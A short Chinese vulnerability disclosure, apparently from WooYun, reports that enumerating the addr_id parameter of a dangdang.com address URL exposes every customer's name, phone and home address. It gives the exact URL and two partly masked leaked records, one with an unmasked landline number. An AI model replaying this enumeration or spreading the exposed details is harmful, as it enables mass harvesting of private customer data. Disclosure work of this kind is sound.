来源 北京基友团@乌云
简要描述:
某处设计不当,不能过于详细,太容易发现了,可导致所有用户的姓名,联系方式,地址等泄露
详细说明:
登陆后
http://account.dangdang.com/payhistory/myaddress.aspx?addr_id=10000&cid=1&op=bindselected
通过fuzz上面URL中得 addr_id= 可以得到全部的收件地址
漏洞证明:
敏感信息用*代替了
{‘addr_detail’:'(家庭地址)先烈东横**************房’,’city_id’:’5′,’country_id’:’9000′,’cust_address_id’:’10000′,’cust_id’:’2645241′,’errorCode’:0,’province_id’:’144′,’ship_man’:’谢楚*’,’ship_mb’:’13580*******’,’ship_tel’:’020-37245661′,’ship_zip’:’510075′,’status’:’-1′,’statusCode’:0,’town_id’:”}
{‘addr_detail’:'(家庭地址)回龙观***************室’,’city_id’:’1′,’country_id’:’9000′,’cust_address_id’:’10001′,’cust_id’:’3088863′,’errorCode’:0,’province_id’:’111′,’ship_man’:’应*’,’ship_mb’:”,’ship_tel’:’010-817*******’,’ship_zip’:’102208′,’status’:’2′,’statusCode’:0,’town_id’:”}
0 条评论。